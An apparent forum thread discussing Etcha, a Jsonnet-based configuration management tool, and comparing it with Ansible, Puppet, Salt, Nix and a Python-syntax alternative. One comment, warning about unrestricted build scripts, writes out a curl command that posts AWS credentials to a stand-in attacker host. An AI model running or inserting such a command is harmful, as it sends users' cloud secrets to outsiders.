While developing a SaaS, we needed a way to distribute configurations across a wide array machines in a distributed manner. We built Etcha as a way to build and run servers and applications using familiar Jsonnet and GitOps workflows--lint, test, build, and release.
It's nice that you've decided to throw off the golden veil of "declarative" that so many of the tools try to sell themselves as, while in practice the user still ends up attempting to write imperative logic while harangued by the declarative representation.
Couple things I personally take issue with:
String-embedding of code and templates is just straight up a nonstarter for me. I've seen enough dev/ops people struggle with tools like nomad and helm to know any sufficiently complex setup will inevitably become huge, opaque, usability mess.
Finally, I just don't believe a "mutate the bag of state" strategy is the future of config management or DevOps tech. It's shown itself time and time again to be the weakest part of systems like salt, ansible, and puppet. I can't count the number of hours of my life that have been wasted writing code that attempted to, poorly I might add, perpetuate the lie of determinism this tooling tries to sell on top of the mutable bag of state that is an OS.
Your comment really resonates with me, because I'm experimenting with a project to do "ansible, but with Python syntax" [1]. It has some declarative abilities, but also full imperative abilities, and does away with "coding in YAML", so I get full LSP abilities.
I've considered the question: What is the difference between declaratively providing an Apache config file, and just copying that file over unconditionally? The big benefits I've come up with are:
- Detecting the change so I can trigger an Apache restart only when the file has changed.
- Ability to do "--check" and "--diff" to tell me what will change during a dry run.
With the downside that the "tasks" become more complicated to build.
I had previously built a version of my tool that was just a simpler, local ansible-like tool, with a YAML syntax and realized: I really hate coding Ansible playbooks in YAML. So I started imagining what it might look like if it was in code. I picked Python syntax because I really didn't want to write a parser for a DSL and wanted to see if I could get close enough without it.
Love that you're playing in the space! The more people that experiment with approaches, the more we'll see what does and doesn't work.
Couldn't agree more with how painful "coding" in ansible is, my SOP with it is usually just to write a python module to model the flow I'm interested in the moment I find myself trying to implement logic at the yaml layer. The module API isn't horrible, I prefer it quite a bit over puppet's extensibility constructs.
However, the nondeterministic bag-of-state issue will still be impossible to overcome with this strategy. Not to say that making a better ansible isn't valuable for configuration of legacy workloads in legacy runtime environments, only that it's a space that I'm personally putting a lot of energy into never interacting with again if I can help it.
If you think of the system(s) that you're targeting, and the mutation operations that you're defining in the CM language; the configuration files and their contents, binaries and their instances, etc are all contained as a giant bag of state we call the OS and its filesystem and memory contents.
None of the popular configuration management systems can guarantee determinism in mutations over this state, no matter how much the interface and documentation tries to sell it as a feature, it's just not possible.
If it's not apparent why this is the case, then I'd highly recommend not embarking on the process of attempting to create such a system as absolutely enormous amounts of code behind the scenes of the existing systems are aimed at attempting to make it _seem_ like they can be deterministic.
When you say that none of the popular CMs can guarantee determinism, are you meaning things like package drift as the OS upstream updates packages and that sort of thing?
It's a little early to be recommending I don't embark on creating this; you have an idea in your head which the phrase "bag of state" isn't adequate to convey into my head.
The CMs are largely about conveying a state into a system, though there are obviously some places where the state is "leaky" such as if I say "the system will have neovim" and it's leaky because today I may get neovim v0.9.X but tomorrow I may get v0.10.Y?
Or are you meaning something like "my laptop install that I've been using for 3 years has a state that is very different from a clean install, so running this playbook on two systems and requesting "nvim" may produce v0.9.x on one, but alpha v0.11.Z on another because I've added a PPA to it"?
I'm honestly just trying to understand what issue you are bringing up, and I appreciate the discussion.
For some context: I've been using Ansible for ~7 years now, my combined "main.yml" files total just over 19K lines, nearly my entire Linux infrastructure comes up from a base OS install and an Ansible run, ~200 machines, and I respin half my dev+stg infrastructure every night to make sure I'm running against my latest playbooks.
I don't know if you've considered it, but I would really value Starlark over "general purpose" python because my grave complaint about unlimited computation things for build systems (gradle, sbt :eyes:), or in this case a config management tool, is that they become real hard to reason about from one developer's machine to another, and/or make the hairs stand up for paranoid folks who really would prefer there not be a $(curl -d @$HOME/.aws/credentials evil.example) hiding in a random build script
It also prevents newbies from mistakenly doing os.chdir when they really wanted fs.cd() as in your example playbook
That's a fascinating idea, and does resolve the biggest downside compared to uPlaybook; the benefit of yaml is that you can't really sneak code in there. Thanks for putting that on my radar!
I'm trying to do a similar thing but I'd like to be compatible with the existing Ansible tasks. Still trying to figure out the API, especially for cases like calling a playbook from playbook with some parameters.
I am looking at adding the ability to call Ansible tasks (community.apt, for example) from uPlaybook, but that would not involve calling YAML playbooks I'm not thinking... But maybe that would be possible.
I did try some other YAML control structures in the original version of uPlaybook, what I'm calling uPlaybook1 [1] now, which I think has some more natural control structures than Ansible. If you are doing something similar, may be worth looking at what I came up with:
- I ended up using "block:" as a way of grouping tasks, and you could add conditionals or loops on those:
I had that on my list to give a more thorough look-see a few months ago after it was mentioned in some discussion about fabric replacement. Thanks for putting that back on my radar.
I had been wanting to leverage Ansible to get a bunch of functionality with little additional effort, but was trying to do it via direct Ansible API calls, and having no luck. I tried the same with pyinfra with similar results. However, I was able to build a shim that calls pyinfra, and I'm making wrappers to import that functionality into uPlaybook.
So now I have apt and systemd and pip support that I had been wanting.
The primary benefits of uPlaybook over Ansible/pyinfra/Chef, etc, are:
- Playbook discoverability. (Run "up" and it'll give you a list of available playbooks an a short description of them).
- Playbook arguments. (Run "up playbook --help" to get a list of CLI arguments the playbook takes. Instead of static playbooks you can have templatable plays that automate generic tasks with specializations).
- Lack of boilerplate for local host operations. (You don't have to set up inventories, you just run a playbook, with the limitation that you are running locally. IOW, local operation is dead simple, like with a shell script).
Throw rocks at me if you like, but ansible is a more swiss army knife than just CM; I can trivially provision a cloud something (and there are a lot of cloud somethings that it supports, not just "hurr, I can make an ec2 instance hurr"), then do traditional config-management upon those resources, then do local tasks -- which I recognize may rub folks the wrong way, but for good or bad it's damn handy in a lot of my specific use cases -- then go back to doing cloud or CM stuff, all within the same playbook
Also, it really jams me up their crazy nomenclature <https://docs.saltproject.io/en/3005/glossary.html> trying to be "cutesy" with really going all-in on that salt thing. I have heard similar, justified, complaints about Brew's "Cellar", "Keg", "Tap", etc
A co-worker keeps mentioning we should use terraform, but I'm not getting a very good answer, and haven't had time to do my own research, on why we should use TF rather than writing playbooks to provision AWS resources. Your comment above makes me wonder if, because I'm so steeped in Ansible, I'm not realizing that some of the other CMs are lacking these functions and need to lean on TF, where in Ansible you do not. I'm willing to admit that TF might be a better way of expressing it.
As far as cutesy language, I don't really get jammed up by it, but I'll admit I kind of roll my eyes whenever I come across it. If it's a great tool, I'll overlook that (as in the case of brew). Kind of a "bless your heart" situation. :-)
At the time I selected Ansible, Saltstack had just had a fairly serious "we invented our own crypto" issue, but also Ansible's agentless approach was nice for my environment, though saltstack did have some great demos of what you could do with their approach, and, I had friends who were working on Ansible, which seemed like it was worth something... I'll take a look to see if Saltstack is in the same space as uPlaybook.
> String-embedding of code and templates is just straight up a nonstarter for me
Can you expand on this?
> Finally, I just don't believe a "mutate the bag of state" strategy is the future of config management or DevOps tech.
Unfortunately that is how operating systems work (today). Even Nix struggles with state (though that's typically a bug). Properly controlling/preventing side effects with configuration management would require a new OS paradigm IMO.
> I can't count the number of hours of my life that have been wasted writing code that attempted to, poorly I might add, perpetuate the lie of determinism
One nice thing of Etcha is it makes testing your stuff really simple. Testing is baked into the tool, and you don't really have to write separate tests, the test is if your check passes/fails correctly after a command is changed/removed. Checkout the docs on it here for more info, it really helps with validation: https://etcha.dev/docs/guides/testing-patterns
This may be quite clear in its simplicity, and particularly to those familiar with etcha/jsonnet. However, what invariably happens is that you start seeing things like vars embedded in templates, embedded in the config mgmt implementation language, embedded in strings. The source of the values becomes incredibly difficult to reason about and to make changes against; does the value come from the target host's env, from the runner's env, from the packaging step's env, from a network request made by one of these stages (eg to a secret server), etc.
Bash code, in yaml, in golang template. Besides even the most advanced IDEs failing to grok such a freak of technical nature, there's no way I would believe any dev that told me they understand what the state of their system will be given some input to this morass.
In a recent position I was asked to try and make an existing nomad installation viable in a pretty standard corporate environment (not some special operational space e.g. cloudflare), and it was even worse; some configuration expansion was 5 layers deep, with 3 different templating engines, once consul templates were involved in generating an app's config, and the nomad config being env-generalized through generation by a higher-level helm-like tooling.
Re state bag:
I'm glad you mentioned nix, as I think it, and to a looser extent containers, really approach the issue in the only humanly-tenable fashion (again IMO): starting mutation from a known state. In a lot of cases that state is "nothing" as it's the simplest known state not only to position the beginning of some configuration flow at, but also the most straight-forward from which to deterministically derive a desired end state from.
I definitely applaud having tests as a core component of your system, the problem is that you can not derive determinism from nondeterminism even with the best tests.
Because you are operating over a nondeterministic bag of state, you can never guarantee that your tests provide a representation of a transfrom from any potential state to the desired end state, only for some particular input state (or set) which may or may not representative of what is found on the actual targets.
I get some "managed ansible executor" vibes from this. And having a hard time differentiating it form the ansible approach.
What advantage does this custum format vs industry standard tools?
Also not entirely sure how state/sync loop is archived from what I've read in the docs. Do I have to change my app to pull config?
- It's Jsonnet instead of YAML/HCL. That means real functions, imports, and data structures.
- It has built in testing and linting functionality
- While push mode functions similar to Ansible, pull mode can scale infinitely as it's just clients pulling a text file. Ansible and friends have a lot of scaling issues with larger clients.
- All of the rendering happens on the client, no need to bundle secrets.
The state/sync loop is achieved by running Etcha as a service or container in pull or push mode. Etcha will periodically pull down new JWTs (or receive pushed) and diff them, run the changes or remove the commands that aren't present.
Ansible pull is definitely an option, but it's not how most folks use Ansible in my experience (preferring Tower or adhoc run books), namely because it's harder to centrally manage and configure. Etcha creates release artifacts instead of pull down a git repo, and allows you to monitor your deployment using metrics services like Prometheus. Additionally, there is a complete webhook framework for triggering runs.
I've desperately wanted a modern config management tool for ages. This looks nice, although I'd need to actually use it to be able to tell if would work for me. I've worked with both Ansible and Puppet and prefer Puppet's architecture, but it is an absolute beast of a tool.
Unfortunately, I think the production licensing here will limit the success. I can't see companies forking out $1,000 a year for an immature tool with no ecosystem when they could just use Ansible/Puppet/Salt. Not necessarily even because of the cost, it's just a lot of extra bureaucracy to get products approved in some places.
I have a few customers, the $1,000 subscription isn't a deal breaker at all. It's typically easy to get small expenses like that approved/whip out the credit card for most businesses.
Additionally, you can use the software without the subscription for your personal needs or in a non-production/evaluation phase.
In the next couple of weeks we'll release EtchaOS, an immutable "meta Linux distro" that bundles Etcha, systemd, and containerd/docker on different variants like Debian, Alma, Fedora and architectures like amd64 and aarch64.
Yes, I don't doubt you'll have customers. From the docs, I just don't see a compelling advantage Etcha has over existing tools that justifies the cost.
Did you consider having an open beta? It might allow the ecosystem to develop while still enabling you to charge for the product later down the line.
At my last job at a bank you most likely know of, getting any kind of product is a multi-month painful bureaucratic process. So engineers tend to live off the land with the stuff they can get for free, despite funds not being an issue.
> Did you consider having an open beta? It might allow the ecosystem to develop while still enabling you to charge for the product later down the line.
I don't think being free for personal/non production limits the ecosystem at all. Additionally, I don't appreciate rug pulls from changing free to non-free down the road, and I doubt my customers would.
The pricing is what it is: ensure Etcha is sustainable and supported. Think of it as a forced OSS donation if you want. There's way more than $1,000 worth of value here.
>I don't think being free for personal/non production limits the ecosystem at all
There are two aspects. The first one being that charging a nonzero amount decreases adoption, so fewer companies will publish modules and tools around it. The other is that people will generally not want to send pull requests adding features to something they have no stake in. If we take HashiCorp Packer or Ansible as an example, they have flourished as engineers send PRs extending the tools for their own purposes.
Another thought that comes to mind is: what if your company disappears one day? Can you make some assurances that the source will be relicensed to allow users to maintain it?
I wish your product great success. If it feels nice I may even end up getting a license in a future job myself. But I have stated my concern of missing out on all that the Ansible/Puppet community already provides.
I proposed something similar at $work for edge environments where a full k8s CP doesn't make sense though I kept it pull only by polling S3 for work and pushing responses to an append only log. This uses a declarative k8s syntax so it theoretically allows workloads to be managed either way.
Didn't really get traction, glad to see something like it realized even if it isn't the licensing model I'd pick
Couple things I personally take issue with:
String-embedding of code and templates is just straight up a nonstarter for me. I've seen enough dev/ops people struggle with tools like nomad and helm to know any sufficiently complex setup will inevitably become huge, opaque, usability mess.
Finally, I just don't believe a "mutate the bag of state" strategy is the future of config management or DevOps tech. It's shown itself time and time again to be the weakest part of systems like salt, ansible, and puppet. I can't count the number of hours of my life that have been wasted writing code that attempted to, poorly I might add, perpetuate the lie of determinism this tooling tries to sell on top of the mutable bag of state that is an OS.